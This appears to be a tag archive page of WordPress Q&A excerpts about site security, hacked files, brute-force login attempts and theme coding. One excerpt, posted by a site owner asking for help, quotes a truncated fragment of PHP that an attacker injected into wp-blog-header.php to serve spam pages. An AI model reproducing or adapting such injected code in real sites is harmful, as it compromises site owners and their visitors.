Articles of hacks

How do I specify more than one category?

I am excluding comments from specific categories. However, when I try to exclude more than one, it doesn’t work. This works: <?php if (!in_category('7')) comments_template(); ?> This does not work: <?php if (!in_category('7 , 9')) comments_template(); ?> or <?php if (!in_category('7')) comments_template(); ?> <?php if (!in_category('9')) comments_template(); ?>

If a hacker looked into all PHP files, can he do harm to me?

For example, I had a backup of all FTP content (WordPress installation PHP files), and a hacker got that backup file and looked into all PHP files (including config.php etc.) … can he somehow access my WordPress site? Remote database is disabled.

Why were lots of ad links inserted into my blog posts by others?

I found that lots of ad links have been inserted into my blog posts. I’m using WordPress 2.9.2; is there a known security vulnerability in it? A screenshot: I post some code on my blog, and the ad links are inserted into it. I deleted them by hand several days ago, and I found that they’re back […]

Attack on wp-login.php and xmlrpc.php

I am receiving many requests to my wp-login.php and xmlrpc files. I just set up an htaccess to prevent requests to xmlrpc, but how do you suggest I block wp-login? Thanks

How to prevent a bot or someone from modifying any file automatically?

Someone is modifying our website file wp-blog-header.php daily. They are adding the code below, which automatically generates unnecessary pages on our website. The code is: $e = pathinfo($f = strtok($p = @$_SERVER["REQUEST_URI"], "?"), PATHINFO_EXTENSION); if ((!$e || in_array($e, array("html", "jpg", "png", "gif")) || basename($f, ".php") == "index") && in_array(strtok("="), array("", "p", "page_id")) && (empty($_SERVER["HTTP_USER_AGENT"]) || (stripos($u = […]

WordPress login urls

Recently we’ve noticed a lot of brute force attacks on our website. To make things more secure we decided to limit access to the wp-login URL to only a few trusted IP addresses. <Files wp-login.php> order deny,allow Deny from all allow from {IP-ADDRESS} </Files> This works, and only allowed IPs are able to access […]

Hacking TinyMCE for better usability (shortcodes and html)

I’m looking for some theme or plugin examples that showcase ways in which to enhance the usability of editing shortcodes and/or custom html objects that have been inserted into the editor. I know that it’s possible to apply runtime styles to elements (nextpage and image rollovers are a couple of examples) and I’m looking for some […]

Explanation of this hacked code

Hi, I found some new code in the wp-config.php file of one of my sites; it seems to have been placed there by a hacker. Can anyone explain what it does? http://pastebin.com/fdMJCAXw

Posts in multiple Categories different single.php

I am smashing my head against some code. Here is the situation: I have one post in 3 different categories, this post has to be visible in “category 1” with the single1.php, in “category 2” with single2.php and in “category 3” with single3.php. Obviously the 3 single.php pages have a different template inside. For example […]

Brute force attack?

I’m seeing this quite often: No OS, same Browser, weird hostname — they’re definitely not real users. Can I do anything to take precautions before they do something? Thanks!